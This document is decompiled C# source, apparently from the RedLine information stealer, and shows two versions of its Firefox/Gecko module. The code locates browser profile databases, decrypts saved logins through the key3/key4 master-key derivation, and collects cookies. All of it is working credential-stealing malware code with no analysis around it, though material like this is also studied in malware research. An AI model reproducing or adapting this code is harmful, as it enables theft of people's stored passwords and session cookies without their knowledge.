// Token: 0x060002C7 RID: 711 RVA: 0x0000C99C File Offset: 0x0000AB9C private static List <LoginPair> GetCredentials(string profile) { List <LoginPair> list = new List <LoginPair>(); try { if (File.Exists(Path.Combine(profile, "key3.db"))) { bool flag; string text = DecryptHelper.TryCreateTemp(Path.Combine(profile, "key3.db"), out flag); list.AddRange(GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(text))); if (flag) { File.Delete(text); } } if (File.Exists(Path.Combine(profile, "key4.db"))) { bool flag2; string text2 = DecryptHelper.TryCreateTemp(Path.Combine(profile, "key4.db"), out flag2); list.AddRange(GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(text2))); if (flag2) { File.Delete(text2); } } } catch (Exception) { } return(list); }
// Token: 0x060002CB RID: 715 RVA: 0x0000D09C File Offset: 0x0000B29C private static byte[] GetPrivate3Key(string file) { byte[] array = new byte[24]; try { if (!File.Exists(file)) { return(array); } MethodInfo method = typeof(Array).GetMethod("Copy", new Type[] { typeof(Array), typeof(int), typeof(Array), typeof(int), typeof(int) }); GeckoDatabase berkeleyDB = new GeckoDatabase(file); PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("password-check"))); string hexString = GeckoEngine.ParseDb(berkeleyDB, (string x) => x.Equals("global-salt")); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); geckoPasswordBasedEncryption.Init(); TripleDESHelper.Decrypt(geckoPasswordBasedEncryption.DataKey, geckoPasswordBasedEncryption.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None); Asn1Object asn1Object = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (string x) => !x.Equals("password-check") && !x.Equals("Version") && !x.Equals("global-salt")))); GeckoPasswordBasedEncryption geckoPasswordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(hexString), Encoding.GetEncoding("windows-1251").GetBytes(string.Empty), asn1Object.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData); geckoPasswordBasedEncryption2.Init(); Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.GetEncoding("windows-1251").GetBytes(TripleDESHelper.Decrypt(geckoPasswordBasedEncryption2.DataKey, geckoPasswordBasedEncryption2.DataIV, asn1Object.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData); if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24) { method.Invoke(null, new object[] { asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, array, 0, 24 }); } else { array = asn1Object2.Objects[0].Objects[3].ObjectData; } } catch { } return(array); }
// Token: 0x060002C6 RID: 710 RVA: 0x0000C800 File Offset: 0x0000AA00 public static List <Browser> ParseBrowsers(IList <string> paths) { List <Browser> list = new List <Browser>(); try { foreach (string text in paths) { try { string fullName = new FileInfo(text).Directory.FullName; string text2 = text.Contains(Constants.RoamingAppData) ? GeckoEngine.GetRoamingName(fullName) : GeckoEngine.GetLocalName(fullName); if (!string.IsNullOrEmpty(text2)) { Browser browser = new Browser { Name = text2, Profile = new DirectoryInfo(fullName).Name, Cookies = new List <Cookie>(GeckoEngine.ParseCookies(fullName)).IsNull <List <Cookie> >(), Credentials = new List <LoginPair>(GeckoEngine.GetCredentials(fullName).IsNull <List <LoginPair> >()).IsNull <List <LoginPair> >(), Autofills = new List <Autofill>(), CreditCards = new List <CreditCard>() }; if (browser.Cookies.Count((Cookie x) => x.IsNotNull <Cookie>()) <= 0) { if (browser.Credentials.Count((LoginPair x) => x.IsNotNull <LoginPair>()) <= 0) { continue; } } list.Add(browser); } } catch { } } } catch (Exception) { } return(list); }
private static List <LoginPair> GetCredentials(string profile) { List <LoginPair> loginPairList = new List <LoginPair>(); try { if (File.Exists(Path.Combine(profile, "key3.db"))) { loginPairList.AddRange((IEnumerable <LoginPair>)GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate3Key(DecryptHelper.CreateTempCopy(Path.Combine(profile, "key3.db"))))); } if (File.Exists(Path.Combine(profile, "key4.db"))) { loginPairList.AddRange((IEnumerable <LoginPair>)GeckoEngine.ParseLogins(profile, GeckoEngine.GetPrivate4Key(DecryptHelper.CreateTempCopy(Path.Combine(profile, "key4.db"))))); } } catch { } return(loginPairList); }
private static byte[] GetPrivate3Key(string file) { byte[] numArray = new byte[24]; try { if (!File.Exists(file)) { return(numArray); } DataTable dataTable = new DataTable(); GeckoDatabase berkeleyDB = new GeckoDatabase(file); PasswordCheck passwordCheck = new PasswordCheck(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("password-check")))); string db = GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => x.Equals("global-salt"))); GeckoPasswordBasedEncryption passwordBasedEncryption1 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), DecryptHelper.ConvertHexStringToByteArray(passwordCheck.EntrySalt)); passwordBasedEncryption1.Init(); TripleDESHelper.Decrypt(passwordBasedEncryption1.DataKey, passwordBasedEncryption1.DataIV, DecryptHelper.ConvertHexStringToByteArray(passwordCheck.Passwordcheck), PaddingMode.None); Asn1Object asn1Object1 = Asn1Factory.Create(DecryptHelper.ConvertHexStringToByteArray(GeckoEngine.ParseDb(berkeleyDB, (Func <string, bool>)(x => { if (!x.Equals("password-check") && !x.Equals("Version")) { return(!x.Equals("global-salt")); } return(false); })))); GeckoPasswordBasedEncryption passwordBasedEncryption2 = new GeckoPasswordBasedEncryption(DecryptHelper.ConvertHexStringToByteArray(db), Encoding.Default.GetBytes(string.Empty), asn1Object1.Objects[0].Objects[0].Objects[1].Objects[0].ObjectData); passwordBasedEncryption2.Init(); Asn1Object asn1Object2 = Asn1Factory.Create(Asn1Factory.Create(Encoding.Default.GetBytes(TripleDESHelper.Decrypt(passwordBasedEncryption2.DataKey, passwordBasedEncryption2.DataIV, asn1Object1.Objects[0].Objects[1].ObjectData, PaddingMode.None))).Objects[0].Objects[2].ObjectData); if (asn1Object2.Objects[0].Objects[3].ObjectData.Length > 24) { Array.Copy((Array)asn1Object2.Objects[0].Objects[3].ObjectData, asn1Object2.Objects[0].Objects[3].ObjectData.Length - 24, (Array)numArray, 0, 24); } else { numArray = asn1Object2.Objects[0].Objects[3].ObjectData; } } catch { } return(numArray); }
public static List <Browser> ParseBrowsers() { List <Browser> browserList = new List <Browser>(); try { List <string> stringList = new List <string>(); stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.LocalAppData, 4, 1, "key3.db", "key4.db", "cookies.sqlite", "logins.json")); stringList.AddRange((IEnumerable <string>)DecryptHelper.FindPaths(RedLine.Logic.Helpers.Constants.RoamingAppData, 4, 1, "key3.db", "key4.db", "cookies.sqlite", "logins.json")); foreach (string fileName in stringList) { string fullName = new FileInfo(fileName).Directory.FullName; string str = fileName.Contains(RedLine.Logic.Helpers.Constants.RoamingAppData) ? GeckoEngine.GetRoamingName(fullName) : GeckoEngine.GetLocalName(fullName); if (!string.IsNullOrEmpty(str)) { Browser browser = new Browser() { Name = str, Profile = new DirectoryInfo(fullName).Name, Cookies = (IList <Cookie>) new List <Cookie>((IEnumerable <Cookie>)GeckoEngine.ParseCookies(fullName)).IsNull <List <Cookie> >(), Credentials = (IList <LoginPair>) new List <LoginPair>((IEnumerable <LoginPair>)GeckoEngine.GetCredentials(fullName).IsNull <List <LoginPair> >()).IsNull <List <LoginPair> >(), Autofills = (IList <Autofill>) new List <Autofill>(), CreditCards = (IList <CreditCard>) new List <CreditCard>() }; if (browser.Cookies.Count <Cookie>((Func <Cookie, bool>)(x => x.IsNotNull <Cookie>())) > 0 || browser.Credentials.Count <LoginPair>((Func <LoginPair, bool>)(x => x.IsNotNull <LoginPair>())) > 0) { browserList.Add(browser); } } } } catch { } return(browserList); }